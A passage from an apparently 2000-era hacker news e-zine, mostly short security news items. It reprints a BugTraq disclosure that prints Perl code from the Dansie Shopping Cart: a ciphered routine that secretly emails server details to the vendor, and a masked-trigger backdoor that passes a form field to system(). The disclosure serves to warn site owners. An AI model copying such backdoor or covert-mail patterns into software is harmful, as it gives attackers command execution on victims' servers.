find a new shopping cart provider. "His credibility is destroyed. Would you ever again trust anybody who did this? Imagine if it had been Microsoft," Harris said. http://www.dansie.net/cart.html http://www.blarg.net/ http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-04-08&msg=Pine.LNX.3.95.1000411171050.24527G-100000@animal.blarg.net To: BugTraq Subject: Back Door in Commercial Shopping Cart Date: Tue Apr 11 2000 02:24:06 Author: Joe Message-ID: Trojanized Commercial Shopping Cart =============================================================== Dansie Shopping Cart Version : 3.04 (presumably earlier versions as well) Author : Craig Dansie URL : http://www.dansie.net/ Language : Perl (both NT and Unix platforms are vulnerable) License : Commercial, starting at $150.00 Copyright Dec 10, 1997-2000, Dansie Website Design Synopsis : This program -deliberately- allows arbitrary commands to be executed on the victim server. One of our clients, while installing and configuring the Dansie Shopping Cart, ran into difficulty integrating PGP, the shopping cart program, and our secure server setup. While trying to assist our client with the cart and PGP configuration we discovered a couple of things. The CGI, under certain conditions, sends an email to the author of the Dansie shopping cart software, 'tech@dansie.net'. This is not readily apparent as the code that handles this transaction incorporates a simple Caesar Cipher to hide the email address. The cipher is handled via the subroutine 'there2': ------ sub there2 { $_ = "$_[0]"; tr/a-z0-9/gvibn9wprud2lmx8z3fa4eq15oy06sjc7kth/; tr/_/-/; tr/\@/\./; return $_; } ------- The call that creates this email address and sends the mail is the function 'there3'. ------- sub there3 { if (($ENV{'OS'} !~ /Windows_NT/i) && ($mailprog) && (-e "$mailprog")) { $a = &there2('8v59')."\@".&there2('kte3cv').".".&there2('ev8'); $b = &there2('8v59_3jhhzi8'); pop(@there2); pop(@there2); $c = &there2("@there2"); open (TECH, "|$mailprog $a"); print TECH "To: $a\n"; print TECH "From: $a\n"; print TECH "Subject: $b\n\n"; print TECH "$path3\n"; print TECH "$ENV{'HTTP_HOST'} $ENV{'SERVER_NAME'}\n"; print TECH "$c\n"; print TECH "$e $there\n" if ($e); close (TECH); } } ------- The ciphered strings, when passed through 'there2', result in: 8v59 == tech kte3cv == dansie ev8 == net 8v59_3jhhzi8 == tech-support $a == tech@dansie.net $b == Subject: tech-support This seems curious, but plausible reasons could include insuring License compliance, or maybe the cart automatically sends this email when an error occurs. The program definitely goes out of its way to hide the fact that the mail is being sent. While going through the rest of the code we discovered a much more interesting item. (We've masked out the actual trigger element with question marks) ---------- if ( ( ( $FORM{'?????????'}) && ($ENV{'HTTP_HOST'} !~ /($d)/) ) || ( ($FORM{'?????????'} ) && (!$d) ) ) { if ( $ENV{'OS'} ) { system("$FORM{'?????????'}"); } else { open(ELIF,"|$FORM{'?????????'}"); } exit; } --------- The form element '?????????', which was originally a pseudo-random appearing nine digit string of letters and numbers, allows an intruder to execute any command on the server with the same privileges as the CGI process itself. Although this is a full disclosure list, the trigger element is obscured to prevent the script kiddies from running away with this back door. If you own the cart, then you have access to the source code and can discover the element in question easily enough on your own. Further searches through the code reveal that this form element is immune to data validation - it gets passed into this code fragment unchallenged. The '$d' variable of the condition which permits the back door to function is set elsewhere in the program to contain the string 'dansie'. (Again, using the ciphertext algorithm) This indicates that the form element won't work on Dansie's own host, but will work on anyone elses. There are additional problems with the 'there' function but we'll leave them as exercises for the reader to decipher. Dansie.net, armed with the server name and URL to the CGI executable provided by the cloaked email routine, would be able to run commands on any web server on the Internet that has the Dansie Shopping Cart installed. It takes little imagination to dream up the potential havoc and privacy violations this level of access could result in; from stealing private customer records to a full-blown crack of an E-Commerce server. When checking to see if this was a known issue, the following post from "Kasey Johns" , made a little over a week ago, was discovered in alt.comp.perlcgi.freelance: http://www.deja.com/getdoc.xp?AN=601644315 Follow-up article: http://www.deja.com/getdoc.xp?AN=601857849 We won't quote Kasey's posts here, in brief, Kasey also discovered the back door and cloaked email routines. Kasey also provides evidence in the post to indicate that not only is Dansie well aware of the back door routine, but may be actively attempting to utilize it. Based upon our own investigation, the information Kasey posted, and our own firewall logs (see below), it is our opinion that the back door within Dansie.net's shopping cart can best be summarized as follows: 1. The back door is very deliberate. 2. It isn't unique to the one copy we have access to here. 3. *Is being actively utilized by the author of the CGI. * Based upon the log snippet in Kasey's post showing attempted access to the CGI from an Earthlink dial-up IP. (209.179.141.0/24). According to Kasey, access to the CGI was attempted less than 30 minutes after the cart was installed. When we noticed the attempted usage of Kasey's server, a quick check of our own firewall logs revealed the following: Packet log: input REJECT eth0 PROTO=6 209.179.141.xx:1054 x.x.x.x:80 {repeated several dozen times} We can only assume these attempts, made from the same /24 on Earthlink's dial-ups as the one used to probe Kasey's server, were from the author of the shopping cart. We will not try to hazard a guess as to why Dansie.net felt the need to include a back door within their shopping cart software. Whatever their reasoning may be, it is our opinion that no reason, no matter how well thought out or rationalized, justifies the existence of this back door. No reasoning can possibly explain away a routine that deliberately allows an intruder unrestricted and unauthorized access to any server on the Internet that has the Dansie Shopping Cart installed. -- Joe Technical Support General Support: support@blarg.net Blarg! Online Services, Inc. Voice: 425/401-9821 or 888/66-BLARG http://www.blarg.net @HWA 61.0 [HNN] MostHateD Pleads Guilty ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 14th contributed by Cacopalyse MosthateD (Patrick W. Gregory) a member of the online group Global Hell (gH) has pleaded guilty to a single count of conspiracy to commit telecommunications wire fraud in Texas US District Court. He could receive up to five years in prison and a $250,000 fine. MostHateD was among those snared during the wave of FBI raids immediately following the defacement of the White House web page. Mindphaser (Chad Davis), who was snagged during the same set of raids, pleaded guilty to similar charges earlier this year in Green Bay Wisconsin. NewsBytes http://www.newsbytes.com/pubNews/00/147420.html Pay to play pocket book ream site - sorry no story - Ed @HWA 62.0 [HNN] NSA And CIA Deny Echelon is Used Domestically ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 14th contributed by root66 CIA Director George Tenet and NSA director Lt. Gen. Michael V. Hayden staunchly denied allegations that either agency conducts electronic surveillance on US citizens. The denials were in front of the US House intelligence committee. After the hearing, Chairman Porter Goss, R-Fla. said he was satisfied that "our safeguards are in place and are working." Associated Press - via San Jose Mercury News http://www.mercurycenter.com/svtech/news/breaking/merc/docs/037020.htm Dead Url @HWA 63.0 [HNN] Keyboard Monitoring Becoming More Popular with Business ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 14th contributed by root66 While keystroke monitoring software has been around for decades it has recently become extremely popular in the corporate setting. With the courts consistently siding with the employers on electronic monitoring of employees and the low cost and availability of keystroke recording software (This article says $99 but there are a lot of free ones.) businesses are starting to snoop on their employees more and more. San Jose Mercury News http://www.mercurycenter.com/svtech/news/breaking/merc/docs/085400.htm Dead Url @HWA 64.0 [HNN] Japanese Cult Wrote Software for Navy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 14th contributed by root66 HNN has reported on this before but another story has popped up regarding the Japanese cult Aum Shinri Kyo (Supreme Truth), which was involved with releasing nerve gas in a Japanese subway killing 12 people, and their involvement with developing software for the Maritime Self Defense Force, or navy, including the whereabouts of submarines. (Japan has submarines?) Reuters - via The San Jose Mercury News http://www.mercurycenter.com/breaking/docs/081626.htm Dead Url @HWA 65.0 [HNN] MPAA Suspects Denial of Service Attack ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 14th contributed by Cruciphux Yesterday HNN reported a rumor that the MPAA was under a denial of service attack. Today MSNBC has received confirmation that administrators of the site suspect that their current problems are related to some sort of DoS attack. The attack is believed to be in retaliation for the MPAA action regarding the DeCSS software. MSNBC http://www.msnbc.com/news/394566.asp?0m Dead Url @HWA 66.0 [HNN] Even More E-zines ~~~~~~~~~~~~~~~~~~~~~~~ April 14th contributed by Slider_100 Oblivion Mag is the latest UK underground e-zine for hackers, phreakers and vXers! issue #2 has just been released with the first published interview with Curador. Also L33tdawg from Hack In The Box has announced the availability of Issue #4. Oblivion Mag Hack In the Box http://www.oblivion-mag.org.uk http://www.hackinthebox.org @HWA 67.0 [HNN] BackDoor Now Called a Bug ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 17th contributed by danders dvwssr.dll, part of Microsoft server software with Front Page extensions was revealed last Friday to have a backdoor password within it that could allow malicious users access to the server. After originally acknowledging the problem last Friday Microsoft is now claiming that it is nothing more than bug. (Regardless of whether this is a backdoor or a bug the fact that such items are present in release versions of the code forces the user to question the completeness of Microsofts quality assurance.) MSNBC Microsoft NT Bug Traq http://www.msnbc.com/news/394810.asp http://www.microsoft.com/technet/security/bulletin/ms00-025.asp http://www.ntbugtraq.com/default.asp?pid Microsoft Security Bulletin (MS00-025) Procedure Available to Eliminate "Link View Server-Side Component" Vulnerability Originally Posted: April 14, 2000 Updated: April 17, 2000 Summary On April 14, 2000, Microsoft issued the original version of this bulletin, to discuss a security vulnerability affecting several web server products. Shortly after publishing the bulletin, we learned of a new, separate vulnerability that increased the threat to users of these products. We updated the bulletin later on April 14, 2000, to advise customers of the new vulnerability, and noted that we would provide additional details when known. On April 17, 2000, we updated the bulletin again to provide those details. A procedure is available to eliminate a security vulnerability that could allow a malicious user to cause a web server to crash, or potentially run arbitrary code on the server, if certain permissions have been changed from their default settings to inappropriate ones. Although this bulletin has been updated several times as the investigation of this issue has progressed, the remediation steps have always remained the same – customers running affected web servers should delete the affected file, Dvwssr.dll. Customers who have done this at any point in the past do not need to take any further action. Frequently asked questions regarding this vulnerability and the procedure can be found at http://www.microsoft.com/technet/security/bulletin/fq00-025.asp Issue Dvwssr.dll is a server-side component used to support the Link View feature in Visual Interdev 1.0. However, it contains an unchecked buffer. If overrun with random data, it could be used to cause an affected server to crash, or could allow arbitrary code to run on the server in a System context. By default, the affected component, Dvwssr.dll, resides in a folder whose permissions only allow web authors to execute it. Under these conditions, only a person with web author privileges could exploit the vulnerability – but a web author already has the ability to upload and execute code of his choice, so this case represents little additional threat. However, if the permissions on the folder were set inappropriately, or the .dll were copied to a folder with lower permissions, it could be possible for other users to execute the component and exploit the vulnerability. Affected Software Versions The affected component is part of Visual Interdev 1.0. However, it is a server-side component, and is included in the following products Microsoft® Windows NT® 4.0 Option Pack, which is the primary distribution mechanism for Internet Information Server 4.0 Personal Web Server 4.0, which ships as part of Windows® 95 and 98 Front Page 98 Server Extensions, which ships as part of Front Page 98. NOTE: Windows 2000 is not affected by this vulnerability. Upgrading from an affected Windows NT 4.0 to Windows 2000 removes the vulnerability Installing Office 2000 Server Extensions on an affected server removes this vulnerability. Installing FrontPage 2000 Server Extensions on an affected server removes this vulnerability. Remediation To eliminate this vulnerability, customers who are hosting web sites using any of the affected products should delete all copies of the file Dvwssr.dll from their servers. The FAQ provides step-by-step instructions for doing this. The only functionality lost by deleting the file is the ability to generate link views of .asp pages using Visual Interdev 1.0. More Information Please see the following references for more information related to this issue. Frequently Asked Questions: Microsoft Security Bulletin MS00-025 Microsoft Knowledge Base article Q259799 discusses this issue and will be available soon. Microsoft TechNet Security web site Obtaining Support on this Issue Information on contacting Microsoft Technical Support is available at http://support.microsoft.com/support/contact/default.asp. Revisions April 14, 2000: Bulletin Created. April 14, 2000: Bulletin updated to provide preliminary results of investigation of buffer overrun vulnerability April 17, 2000: Bulletin updated to provide final results of investigation. THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY. Last updated April 17, 2000 © 2000 Microsoft Corporation. All rights reserved. Terms of use. @HWA 68.0 [HNN] North Carolina Plagued by 'hackers' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 17th contributed by Evilution The FBI has warned that North Carolina is infested with '6hackers'9 and that business leaders should be concerned. Doris Gardner from the Charlotte office of the FBI said that several machines within North Carolina had been used in the recent massive DDoS attacks and that such attacks had been launched against North Carolina business. She refused to give further details citing the ongoing investigation but promised a wave of prosecutions soon. (Just what we need, the FBI running around claiming the sky is falling.) The Charlotte Observer ABC News http://www.charlotte.com/observer/natwor/docs/cyberterror0414.htm http://abcnews.go.com/sections/tech/DailyNews/nchack000414.html State Target North Carolina Businesses Target of Net Hackers The Associated Press C H A P E L H I L L, N.C., April 14 — The FBI is investigating computer hacking in North Carolina. FBI agents warn that Internet hackers have targeted several North Carolina businesses in recent months. They say several computer systems in the state have been used by hackers to attack businesses. Investigators spoke Thursday at the annual forum of the North Carolina Electronics and Information Technologies Association. They urged private businesses to cooperate in stopping hackers who are wreaking millions of dollars in damage. This summer, the FBI plans to form a task force with businesses to share information and alerts about hacking attempts. The FBI will also survey North Carolina businesses to see how many have been the victims of cyber-attacks. @HWA 69.0 [HNN] Web Sites Redirected, Serbians Blamed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 17th contributed by Alex The Network Solutions registration database has been compromised again this time by people concerned over the crisis in Kosovo. Adidas, Pfizer, Metro Goldwyn Mayer and LucasArts Entertainments and many others all had their DNS rerouted to point to a page that said 'Kosovo Is Serbia' BBC ABC News Wired WebDNS http://news.bbc.co.uk/hi/english/world/europe/newsid_712000/712211.stm http://www.abcnews.go.com/sections/world/DailyNews/hackers000414.html http://www.wired.com/news/politics/0,1283,35674,00.html http://www.webdns.com/news/item1.html Friday, 14 April, 2000, 01:24 GMT 02:24 UK 'Serb hackers' on the rampage More than 50 websites have been taken over by what is suspected to be a group of Serb hackers. The websites - which included such high-profile names as Manchester United and Adidas - were stripped of their content, and branded with the image of a double-headed eagle, with the words "Kosovo is Serbia". A screen grab from eunet.com's hacked site Many of the sites were Yugoslav, Bosnian and Croatian. The Kosovo Albanian newspaper Koha Ditore and the Albanian site Kosovapress were also among those hacked. In another development, the website of the Serbian Ministry of Information reported that it and other Yugoslav sites had been taken over. It said "American-Albanian propagandists" had forged the entire English version of its site on Wednesday. "In a planned and malicious action, regularly registered Yugoslav sites were taken over on the central server of an American firm involved in the registration of the internet domains," it added. "Numerous sites of the Yugoslav providers, political parties and firms were attacked in a synchronised manner," it said. Chance discovery Most of the companies in the "Kosovo is Serbia" attack have since reclaimed their websites. Manchester United believes the culprits were "cyber-squatters", who register internet sites in the names of celebrities or well-known companies, and then try to sell them back again. An internet company which monitors domain names, WebDNS, spotted that the hacking was part of a sustained campaign. Alex Jeffreys, the technical director of WebDNS, said he noticed that several high-profile web-sites were being hacked on Monday. "I almost stumbled over it by chance, when I noticed that a number of large company domain names had changed ownership," he told News Online. As he began checking details of some of the thousands of websites being supported by the server Webprovider Inc, he discovered more than 50 sites that had been hacked from the same address. Hacked websites viagra.com eunet.com winston.com jamesbond.com indianajones.com mafia.com kosova.com yu.com slovenia.com bosnia.com sarajevo.com warcrimesmonitor.com arkan.com tudjman.com The hacked websites had all been registered with Network Solutions, the world's largest register. Mr Jeffreys said it appeared that the hackers had changed the contact details in Network Solutions' database on Sunday night. The contact addresses were at first transferred to a Yugoslav address, and then on Monday night to an Albanian address. "It seems that the Network Solutions database is quite open for hacking, rather than it being one company in particular," he said. How the hackers worked It is impossible to say exactly who the hackers are, or how they managed to breach databases that should be secure. However, Mr Jeffreys said they probably sent spoof e-mails to Network Solutions, pretending to be from the company concerned, and requesting a change of address. The requests for a modification are sent by an automatic e-mail form. Although Network Solutions was not available for comment, a message on their answer machine said that "if you are making a registrar name change or contact modifications request" there would be delays while they "carefully review your request for change". ABC NEWS; Hack Attack Security Glitch Turns Major Web Sites Into Kosovo Billboards Hackers got into more than 50 Web sites in what appeared to be a coordinated effort to promote Serbs in Kosovo. This is what slovenia.com looked like after the cyber attack. (slovenia.com) By Andrew Chang April 14 — This week, the tensions in Kosovo reached around the world, into innumerable desktops — thanks to a group of hackers. Hackers got into more than 50 Web sites — including those of some high-profile names, like addidas.com, mgm.com and viagra.com — in what appeared to be a coordinated effort to promote Serbs in Kosovo. The sites were stripped of their content, and branded with an image of a two-headed eagle with the words, “Kosovo is Serbia.” The two-headed eagle is a common image in southeastern Europe. It is used by Bosnian Serbs, as well as Albanians, the former Kosovo Liberation Army, and Russians. One London newspaper report said the hackers had hit up to 2,000 Web sites. Among the other sites that were hacked were indianajones.com and jamesbond.com. Many of the targets were from the Balkans. The Kosovo Albanian newspaper Koha Ditore and the Albanian site Kosovoapress were also among those hacked, the BBC reported. Most of the companies have since reclaimed their Web sites. An Odd Discovery Alex Jeffreys, technical director for WebDNS, a London-based Web security and registration firm, says he first noticed the hacking on Monday, when he noticed a large number of domains had changed ownership. Jeffreys told ABCNEWS.com he was scanning a public directory of domain names when he noticed many of them had moved the domain name contacts away from their rightful owners to a Hotmail e-mail address. It is unusual for established companies to move their contact e-mail address to a free e-mail service like Hotmail, Jeffreys said. Signing up for Hotmail is almost anonymous — and brand-name companies usually have e-mail addresses based off their own sites. Network Solutions to Blame? All the hacked Web sites had been registered with Network Solutions, the world’s largest register. The hackers manged to breach security by sending spoof e-mails to Network Solutions, pretending to be from the company concerned and requesting a change of address, said a spokesperson for Network Solutions, who declined to be identified. The spokesperson said the chosen Web sites were hacked because they used the most basic level of online security — an automated process where the e-mail address of a user requesting a change of address is only checked against the e-mail address on record of the person authorized to make such a change, By forging their e-mail addresses, the hackers fooled the automation into thinking they were authorized to make a change — and subsequently moved authority for the site to a Hotmail account. The company does offer its users higher levels of security, the Networks Solutions spokesperson said. Most of the prominent sites were back to normal today, and made no mention of the hacking. A few, like slovenia.com, still displayed the “Kosovo is Serbia” brand. Others, like eunet.com and yu.com, appeared to have been shut down altogether. Jeffreys hoped the Web sites had learned a valuable lesson about security. “It shouldn’t be that simple to make the change,” he said. @HWA 70.0 [HNN] Metallica Sues Napster, Gets Web Site Defaced ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Metallica shows us that they are now as hip as our dads and acting like stuck up suits to prove it, Metallica: you're washed up, too old, your music is limp, and you're old and decrepit. Fuck y'all - Ed. April 17th contributed by Evil Wench Metallica, one of the few groups that owns its own music, has filed suit against Napster and several colleges for copyright infringement. In retaliation Metallica's web site was defaced in protest. This is the second time within the last eight months that the Metallica site has been defaced. ZD Net Attrition Mirror #1 Attrition Mirror #2 http://www.zdnet.com/zdnn/stories/news/0,4586,2543398,00.html http://www.attrition.org/mirror/attrition/1999/08/20/www.metallica.com /toprightpart.html http://www.attrition.org/mirror/attrition/2000/04/14/www.metallica.com / ZDNet Metallica's Napster hit: 'Enter Lawman' Rock group sues Napster and several colleges, alleging copyright violation by allowing the illegal swapping of its storied music. Cybervandals retaliate. By Lisa Bowman, ZDNet News UPDATED April 14, 2000 12:32 PM PT The rock group Metallica has sued Napster Inc. and several colleges, claiming, among other things, that they violated copyright law by allowing illegal swapping of its music. E/M Ventures and Creeping Death Music are also plaintiffs in the suit, which was filed in U.S. District Court in the Central District of California and targets the University of Southern California, Yale University and Indiana University. In apparent retaliation Friday, Metallica's Web site was targeted by cybervandals. The unknown hackers left a simple message: "LEAVE NAPSTER ALONE." Aside from two links -- one to Napster and another to the main page of the official Metallica site -- no other message, on the page or in the source code, was posted. This is the first time a music group has gone after Napster, the controversial software that allows people to locate and copy MP3 files. Dozens of colleges have banned its use, claiming it hogged bandwidth and fearing they would be slapped with lawsuits similar to this one. However, in February, USC bucked that trend, saying that it would continue to allow its students to use the technology, which is downloadable from the Internet. San Mateo, Calif.-based Napster already is the target of a suit by the Recording Industry Association of America, which claims that Napster violates the Digital Millennium Copyright Act, a new law that bars devices that could be used to circumvent copyrights. The suit says students who use Napster 'exhibit the moral fiber of common looters.' Having Metallica as a plaintiff in this latest case gives the industry even more brand-name backing. The recording industry is worried that digital music files will weaken their power over the sale and distribution of songs, and Napster is one of several new technologies that make it easier for people to swap digital music files. 'Morally and legally wrong' In a press release announcing the suit, publicists for the band and music companies even threw in a statement from Metallica drummer Lars Ulrich, who said it is "sickening to know that our art is being traded like a commodity rather than the art that it is." "From a business standpoint, this is about piracy -- aka taking something that doesn't belong to you -- and that is morally and legally wrong." In the suit, Metallica and the music companies claim that Napster not only violated their copyrights, but also encouraged unlawful use of digital audio devices and enabled the violation of the Racketeering Influenced & Corrupt Organizations Act, or RICO. The suit says that students who use Napster to copy files "exhibit the moral fiber of common looters." Napster officials weren't immediately available for comment. @HWA 71.0 [HNN] Japan To Control PS Exports, Fears Weapon Use ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 17th contributed by Evil Wench Japanese officials have placed severe export restrictions on the new PlayStation2 that prevents Sony from shipping units to the US and other countries. Officials fear that the technology could be used as a weapon. An example given was to use the PS2 image processing capabilities to help control a Tomahawk missile. Reuters - via ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2550857,00.html @HWA 72.0 [HNN] Spy Laptop Goes Missing ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 18th contributed by William Knowles A laptop filled with highly secret information was reported missing from a supposedly secure conference room at the State Department's Bureau of Intelligence over a week ago. Officials are unsure at this point if the laptop was stolen or is merely misplaced. (Misplaced?) Associated Press Washington Post http://ap.tbo.com/ap/breaking/MGIVIOBR57C.html defunct url http://www.washingtonpost.com/wp-dyn/articles/A26517-2000Apr16.html Post; State Dept. Computer With Secrets Vanishes By Steven Mufson Washington Post Staff Writer Monday, April 17, 2000; Page A02 A laptop computer containing top-secret information vanished from the State Department's Bureau of Intelligence and Research more than a week ago, and the FBI is investigating whether it was stolen, a senior State Department official said. The laptop's disappearance from a supposedly secure conference room at the department has set off an intense effort to recover the computer and a search for suspects, including contractors who have been renovating the area, the official said. Another person familiar with the incident said that the missing computer contains "code word" information, a classification higher than top secret, and that it includes sensitive intelligence information and plans. The incident is the latest of a string of embarrassing security breaches at the State Department. Last year, counterintelligence officials from the FBI discovered a Russian spy lurking outside the department and later an eavesdropping device planted in a conference room. In 1998, a man dressed in a tweed coat strolled into the executive secretary's office, six doors down from the office of Secretary of State Madeleine K. Albright, helped himself to a sheaf of classified briefing materials in plain view of two secretaries, and walked out. The man was never identified and the materials were never recovered. A senior State Department official said that it remained unclear whether the laptop was misplaced or stolen and that, if it was stolen, whether the thief realized the sensitivity of the material it contained or took it simply for the value of the hardware. The senior State Department official added that the laptop's disappearance was not the result of poor security procedures, but rather the failure of State employees to follow those procedures. He said it appeared that some contractors had not been properly escorted when working in the building. "Some policies and procedures were not followed," said the senior official. "It is my very sincere hope that the responsible individual or individuals will be punished." Another person familiar with the incident said that an official had propped open the door of a secure conference room, that contractors lacking security clearances were working in the sensitive area and that the laptop had not been properly secured. The material the laptop contains is classified as "sensitive compartmented information" (SCI), the government's most sensitive intelligence reports. The Bureau of Intelligence and Research (INR) is responsible for handling all top-secret reports at State; information with lower levels of classification is handled by the Office of Diplomatic Security. Last year, INR came under fire from the department's inspector general for lax handling of that material. "The department is substantially not in compliance with the director of central intelligence's directives that govern the handling of SCI," the inspector general, Jacqueline Williams-Bridger, concluded in the report. The CIA also "questioned INR's dedication" to the proper handling of the top-secret material, the State Department official said. The CIA and other agencies believe that the State Department in general fails to attach adequate importance to safeguarding secrets. The inspector general recommended transferring responsibility for SCI to State's Office of Diplomatic Security. But a just-completed internal review recommended leaving responsibility for SCI with INR and adding 19 new people to help the bureau better handle the material, the department official said. The inspector general's report and the Russian bugging incident prompted criticism from Congress, which sequestered some funding earmarked for INR and demanded a review of how top-secret information is handled at the department. At a Feb. 7 presentation of State's budget, Albright said she was "continuing to study the possible need for structural changes to ensure that the mandate for the best security is everywhere understood and everywhere applied." The State Department laptop incident follows two intelligence episodes involving stolen laptops in England. A laptop containing sensitive information was stolen from a British army officer at Heathrow Airport. Separately, a laptop containing secret information about Northern Ireland was stolen from an MI5 agent at the Paddington Station of the London Underground. In a third incident, an MI6 officer left his laptop computer containing training information about how to be a spy in a taxi after a night spent drinking at a bar near the agency's London headquarters. MI6 is the British agency responsible for foreign intelligence and foreign spies; MI5 handles internal security matters. The MI6 officer's laptop was recovered after the agency placed a classified ad in a newspaper offering a reward for its return. The MI5 officer's computer has not been found. © 2000 The Washington Post Company @HWA 73.0 [HNN] Napster Users May Get Jail ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 18th contributed by knobdicker New sentencing guidelines due to take effect in May could land Napster users in jail. Users of Gnutella, Napigator, Wrapster and other programs could also be effected. The new sentencing guidelines cover intellectual property offenses on an emergency interim basis, and stem from the 1997 No Electronic Theft Act. CNN http://www.cnn.com/2000/TECH/computing/04/14/MP3.crackdown.idg/index.html Swap MP3s, go to jail? From... April 14, 2000 Web posted at: 10:35 a.m. EDT (1435 GMT) by Tom Spring (IDG) -- Pirates. That's all the infuriated music industry sees in Napster, the first online application that lets you download basically any MP3 music without spending a dime. In fact, the Recording Industry Association of America has pushed Napster out on the plank: A San Francisco judge soon will rule on its lawsuit alleging Napster runs a giant haven for music piracy. But the Napster case may be only the opening sword fight. The recording industry is taking very seriously what it considers Internet plundering of its jewels. And new sentencing guidelines scheduled to take effect in May could actually land MP3 pirates in the brig. That is, while simple hobbyist downloads are tough to track, Netizens who violate copyright law by aggressively sharing software and digital tunes face arrest and even jail. Napster is not the only target. Since that suit was filed in December, a fleet of similar applications has sailed onto the Net. Web-based applications such as Gnutella, Napigator, and Wrapster are making it just about impossible to protect music, software programs, photographs, videos, or almost any other copyrighted digital material. The sites promote the programs for legal MP3 trading and often post a policy statement to that effect. In reality, the sites do not police their users (and sometimes note that, as well). The cops know they can't stop everybody, but they aim to get everyone's attention. "There is no way we can arrest a million people," acknowledges Glenn Nick, assistant director of the U.S. Customs Agency's CyberSmuggling Center. The distribution programs have flooded out far too widely for law enforcement to stop all cases of illegal copying. Unlike Napster, many programs in this new breed operate peer-to-peer, so there's no central site for investigators to target. The cuffs aren't digital page Scour.net to debut 'Son of Napster' MP3.com sues the recording industry Create your own MP3 radio station Casio brings MP3 player to the wrist Reviews & in-depth info at IDG.net E-Business World Year 2000 World Questions about computers? Let IDG.net's editors help you Subscribe to IDG.net's free daily newsletter for computer geniuses (& newbies) Search IDG.net in 12 languages But brace yourself for some serious arrests. "People say you can't do anything about speeding," says Randy Thysse, supervisory special agent at FBI headquarters in Washington, D.C. "But [you can] park a cruiser on the side of the road to slow people down." So watch for that virtual patrol car, and expect more than a ticket. Thysse advocates jail time for software and music buccaneers -- and starting next month, judges may go along with him. Convicted copyright offenders can receive jail time under new sentencing guidelines that take effect May 1. The policies cover intellectual property offenses on an emergency interim basis, and stem from the 1997 No Electronic Theft Act. "It's getting increasingly easy to swap software and increasingly hard to catch pirates," says John Wolfe, manager of investigations for the Business Software Association. "These new sentencing guidelines give law enforcement some real ammunition." I fought the law and the law... won? While the Justice Department has shown a great resolve to stop computer piracy, until now criminal penalties have been limited. They are too small to justify the big price tags of investigation and prosecution, says the FBI's Thysse. The BSA and others are betting that high-profile busts will send a clear message to intellectual property crooks. "The odds are you aren't going to get caught," says Wolfe, but you'll never know. You're taking a two-pronged risk when you use these file-swapping tools, points out Nick of the Customs Department. As part of the process, you open your PC to the public so you can download files. This exposes your PC to hackers and viruses. It also exposes you legally. You're a private Netizen when you're simply surfing, but when you open a subdirectory of your PC, you've changed your online status and have become a de facto server, subject to law enforcement investigations. And if they bust you, they can take your equipment. Clearly, law enforcement is doing more than sabre-rattling. But as an aside, Nick comments that it's also time the music industry developed better digital safeguards instead of relying on electronic cops. Peeking into the secret-sharers What does this controversy look like from the other side? I took a look at Gnutella, one of dozens of these new-breed file-swapping programs popping up all over the Net. It connects you to a peer-to-peer distributed network -- basically, a 24-hour impromptu digital swap meet online. Like similar programs, it is clumsy but powerful. Once Gnutella is installed, you must designate a directory on your computer to make "public" and one to receive downloaded files. Connect to the Internet, and the program automatically links you to thousands of people running Gnutella on their PCs. Once connected, your "public" directory and anything in it become part of a gargantuan keyword-searchable database. You can request MP3s, games, software applications, and music videos. Your request moves quickly from computer to computer, returning links to files. Simply click on the files you want, and programs begin to download. Napster, it should be noted, is aimed at music files, while Gnutella has a broader reach. No, PC World does not condone illegal copying of files, and neither does the quasi-official Gnutella site. "There is nothing inherently illegal about sharing files," points out Ian Hall-Beyer, host of the site. But it's clearly a popular pastime. With the Gnutella "monitor" function selected, you can watch in astonishment, as I did, as anonymous users scanned my public directory looking for everything from Windows 2000 and Photoshop to X-rated images and Britney Spears MP3s. (Outta luck, guys!) And at any given moment, hundreds of people are running Gnutella, Napigator, Wrapster, Napster, and similar programs that are still surfacing. They're busily downloading files -- some of them perfectly legally -- but now the feds have them in their spyglass. @HWA 74.0 [HNN] Brazil Tax Records on the Loose ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 18th contributed by EviL Wench The Sao Paulo Crime Laboratory has confirmed that the tax records of 11.5 million Brazilian taxpayers has been leaked to a direct mail marketing form. Officials have not released how the information was compromised. The data reportedly was from 1998 tax returns and included the names, incomes, addresses, telephone numbers, activities and other information of 7.6 million individuals and 3.9 million companies. Nando Times http://www.nandotimes.com/technology/story/0,1643,500193192-500262160-501356912-0,00.html Dead Url @HWA 75.0 [HNN] SingNet Suffers Abuse From Overseas 